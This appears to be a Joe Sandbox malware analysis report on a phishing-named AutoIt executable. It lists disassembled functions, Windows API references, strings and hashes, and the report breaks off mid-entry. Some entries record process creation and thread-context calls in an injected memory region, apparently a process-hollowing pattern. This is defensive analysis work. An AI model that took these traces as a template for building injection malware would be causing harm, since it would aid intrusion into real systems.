Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
Instruction ID: 942c88f49fb453c701acbbc8653048d6ad21f8bf8af2fc02d832067247881dd9
Opcode Fuzzy Hash: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
Instruction Fuzzy Hash: C62124B2925348AFDB00DFA4ED59BDDBBB4FB08711F00821AF615A62A0D7B00584EF90

Function 0092065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0092039A: CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7

GetLastError.KERNEL32 ref: 0092076F
__dosmaperr.LIBCMT ref: 00920776
GetFileType.KERNELBASE(00000000), ref: 00920782
GetLastError.KERNEL32 ref: 0092078C
__dosmaperr.LIBCMT ref: 00920795
CloseHandle.KERNEL32(00000000), ref: 009207B5
CloseHandle.KERNEL32(?), ref: 009208FF
GetLastError.KERNEL32 ref: 00920931
__dosmaperr.LIBCMT ref: 00920938

Strings

H, xrefs: 009208BD

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
Instruction ID: d3af1514111fb37a028cea2d529a03655bb4e0ef0baac0ec9ad1ac26d435c06e
Opcode Fuzzy Hash: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
Instruction Fuzzy Hash: 7EA14632A141188FDF19EF68EC51BAE3BA4AB86320F14025DF8159B3D2D7319D53DB91

Function 008E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78

Part of subcall function 008E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008E3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008E356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0092318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009231CE
RegCloseKey.ADVAPI32(?), ref: 00923210
_wcslen.LIBCMT ref: 00923277
_wcslen.LIBCMT ref: 00923286

Strings

\Include\, xrefs: 008E3527
Software\AutoIt v3\AutoIt, xrefs: 008E3560
Include, xrefs: 00923184, 009231C5
\, xrefs: 0092328C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 6fdca58ae0d75f49b7affc0c61804b139960a08f5348e89a5fafc9282b167cc3
Instruction ID: 9f3d67021182b9fc4cf99519f472f2421a1779927b8b7a5d164beca65aa40188
Opcode Fuzzy Hash: 6fdca58ae0d75f49b7affc0c61804b139960a08f5348e89a5fafc9282b167cc3
Instruction Fuzzy Hash: 9071F3714183009FC314EF29ED8596BBBE8FF86B50F404A2EF555C71A0EB349A48CB62

Function 008E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008E2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 008E2B9D
LoadIconW.USER32(00000063), ref: 008E2BB3
LoadIconW.USER32(000000A4), ref: 008E2BC5
LoadIconW.USER32(000000A2), ref: 008E2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E2BEF
RegisterClassExW.USER32(?), ref: 008E2C40

Part of subcall function 008E2CD4: GetSysColorBrush.USER32(0000000F), ref: 008E2D07
Part of subcall function 008E2CD4: RegisterClassExW.USER32(00000030), ref: 008E2D31
Part of subcall function 008E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
Part of subcall function 008E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
Part of subcall function 008E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
Part of subcall function 008E2CD4: LoadIconW.USER32(000000A9), ref: 008E2D85
Part of subcall function 008E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94

Strings

AutoIt v3, xrefs: 008E2C2F
0, xrefs: 008E2C0F
#, xrefs: 008E2C16

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
Instruction ID: 2091659c7797e0a9ca701049402cba64085626fc5782115fc8cf22f34a2e36a1
Opcode Fuzzy Hash: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
Instruction Fuzzy Hash: 632150B2E28354AFDB109FA5ED65B9D7FF4FB08B60F50011AF504A66A0E7B10540EF90

Function 008E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008E316A,?,?), ref: 008E31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,008E316A,?,?), ref: 008E3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008E316A,?,?), ref: 008E3232
CreatePopupMenu.USER32 ref: 008E3246
PostQuitMessage.USER32(00000000), ref: 008E3267

Strings

TaskbarCreated, xrefs: 008E322D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 2cbefb6554978aec0f10a0a18af182775a7aa5b92236c86a485b77a71720ff65
Instruction ID: 43001c6661ee0fb79b3c2dca610f06b8dac180e24d1d92eaf9c5af852f09858d
Opcode Fuzzy Hash: 2cbefb6554978aec0f10a0a18af182775a7aa5b92236c86a485b77a71720ff65
Instruction Fuzzy Hash: 78419C31228284B7DB291B39AE1DBB93659F747355F44022DF646C72A1DB70CE40A762

Function 041BF860 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 041BF931
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 041BFB57

Memory Dump Source

Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: 8b0542abdbf1e1c3e967ef49e9a1814126e3c8ba51a0e46088c1fbbe8d8d733c
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: E2A10B74E00209EBDB18CFA4C994BEEBBB5FF48304F208599E545BB280D775AA41CF94

Function 008E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CCF

Strings

edit, xrefs: 008E2CAC
AutoIt v3, xrefs: 008E2C89, 008E2C8E, 008E2C8F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
Instruction ID: 15c70c90bf6f24a7f16b94de93a170a7267747b000f2fc078c7a79d1d03c726c
Opcode Fuzzy Hash: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
Instruction Fuzzy Hash: DFF03AB66642907AEB300723AC18E772EFDD7C6F60F54411EFA04A21A0E6610840EBB0

Function 041BF620 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 041BF510: Sleep.KERNELBASE(000001F4), ref: 041BF521

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 041BF74F

Strings

GTNX8GHYG317VXPY7GBGMAQW, xrefs: 041BF7B2, 041BF7B5

Memory Dump Source

Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateFileSleep
String ID: GTNX8GHYG317VXPY7GBGMAQW
API String ID: 2694422964-293475428
Opcode ID: b7b1315ab6f7d62d4db4ba4fd6e574778aae89acc560896008c13b189c6dba57
Instruction ID: 747a55e15143e9cdb111dfe682b3016b45e4d9cd9aa57bbfb8a3f845649ac4d6
Opcode Fuzzy Hash: b7b1315ab6f7d62d4db4ba4fd6e574778aae89acc560896008c13b189c6dba57
Instruction Fuzzy Hash: 1C519570D04289DAEF11DBA8CC55BEEBBB49F05304F004599E648BB2C1D7B91B49CBA5

Function 008E3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B83

Strings

Control Panel\Mouse, xrefs: 008E3B3E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
Instruction ID: 138c870f523182f876e39726db9546ee4798ffce5e6e5abaad04edc34de04b8b
Opcode Fuzzy Hash: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
Instruction Fuzzy Hash: 7A112AB5620248FFDB208FA6DC48AAEB7B8FF86754B104559E806D7110D2319E40A7A0

Function 041BE510 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 041BECCB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 041BED61
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 041BED83

Memory Dump Source

Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 57e3a14045c9b3a7b2a93ddb3e14e60ed87be036e48271b677ced38d2e0e4bd8
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: 9462EC30A14658DBEB24CFA4CC90BDEB776EF58300F1091A9D10DEB2A4E7759E81CB59

Function 008EDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009332B7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: a5fd3b9fb6439487ba148926d87dd07fb35bdf029b783213e7eb706ae6e11fe5
Instruction ID: a371b0c4d6928c44be04b45427e4c1761d266b45c219eeda48fbbe8831d1e0c8
Opcode Fuzzy Hash: a5fd3b9fb6439487ba148926d87dd07fb35bdf029b783213e7eb706ae6e11fe5
Instruction Fuzzy Hash: ABC29B71A00259DFCB24CF69C880AADB7B1FF1A314F248169E956EB3A1D371ED41CB91

Function 008E3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009233A2

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E3A04

Strings

Line: , xrefs: 009233EB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
Instruction ID: c94a7681c2cb88397a578abab713ff785233dcfd0ecb6ca9e84a94173f2233f1
Opcode Fuzzy Hash: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
Instruction Fuzzy Hash: 8831C271418394AAC325EB25DC49BEBB7D8FF82724F50462AF599C3191EB709A48C7C3

Function 008FFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00900668

Part of subcall function 009032A4: RaiseException.KERNEL32(?,?,?,0090068A,?,009B1444,?,?,?,?,?,?,0090068A,008E1129,009A8738,008E1129), ref: 00903304

__CxxThrowException@8.LIBVCRUNTIME ref: 00900685

Strings

Unknown exception, xrefs: 00900692

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: b83f64f19b92643294ecaedb215f6a21c2d258df6f07b2636477138f54c55ac6
Instruction ID: c74cdf7927a7ced5e64b6f540f8db469b57a3ca93674f4357a24629098ce21c1
Opcode Fuzzy Hash: b83f64f19b92643294ecaedb215f6a21c2d258df6f07b2636477138f54c55ac6
Instruction Fuzzy Hash: 60F0442490020D6FCB10B675DC46F5E776DAEC0354F604531BA24D65D2EF71DA6589C0

Function 00967F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009682F5
TerminateProcess.KERNEL32(00000000), ref: 009682FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 009684DD

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: b2fcdb21bc98ecc779ea118e754b078835d29e953f4680a29f435dfb2630e5c6
Instruction ID: acc18e9b5cd1b756d837c93b2a4a688a069687164545a219deec215159c77a35
Opcode Fuzzy Hash: b2fcdb21bc98ecc779ea118e754b078835d29e953f4680a29f435dfb2630e5c6
Instruction Fuzzy Hash: 37126B71A083419FC714DF28C484B6ABBE5FF89318F048A5DE8998B352DB71ED45CB92

Function 008E10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22

Part of subcall function 008E1B4A: RegisterWindowMessageW.USER32(00000004,?,008E12C4), ref: 008E1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008E136A
OleInitialize.OLE32 ref: 008E1388
CloseHandle.KERNEL32(00000000,00000000), ref: 009224AB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: ff26eec7b2beae9c1c49e1a71612f0da5849a2c1073d3dc12bfc4ca754e397be
Instruction ID: 2e12c046835f2eb05047788c8257edba38602bc180b62c3ce7e4e0a3700defc5
Opcode Fuzzy Hash: ff26eec7b2beae9c1c49e1a71612f0da5849a2c1073d3dc12bfc4ca754e397be
Instruction Fuzzy Hash: B271C2B59293408FC7A4DF7AAA656953BE1FB893603D4832EE01AC7271EBB04440EF51

Function 009186AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,009185CC,?,009A8CC8,0000000C), ref: 00918704
GetLastError.KERNEL32(?,009185CC,?,009A8CC8,0000000C), ref: 0091870E
__dosmaperr.LIBCMT ref: 00918739

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: d6e94fe3be6e3d8f8bad6b367dc2933c3930e50cf701ab8474e663960e15e94b
Instruction ID: a2d63d2faafd98d406fd72768246b3ff325e2f441b0e632ccbd508e0f8a5f17e
Opcode Fuzzy Hash: d6e94fe3be6e3d8f8bad6b367dc2933c3930e50cf701ab8474e663960e15e94b
Instruction Fuzzy Hash: 67014E3370562896D665633469497FF6B4D4BC17B4F3A021EF8389B1D2DEA1CCC2A150

Function 008F1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008F17F6

Strings

CALL, xrefs: 008F17C6

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: e8a9a4a5df90c698c745d96397e13698fa890d8c98c847d7af50eecd1471e734
Instruction ID: 1ccef47778a186a0d2029ede60ddb28bf5c4c13c0e7b23114d1dd0ff452d9ac6
